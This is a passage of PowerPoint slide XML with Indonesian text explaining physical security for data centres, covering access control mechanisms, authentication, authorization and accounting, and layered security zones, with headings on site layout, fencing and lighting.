            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, fob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> video, sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan alarm. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendinginan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebakaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar-dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi-Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghalang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otorisasi-Menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghalang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akuntansi-Mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghalang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Satu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghalang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemajuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47423767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Tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lokasi, Pagar, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencahayaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lingkungan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
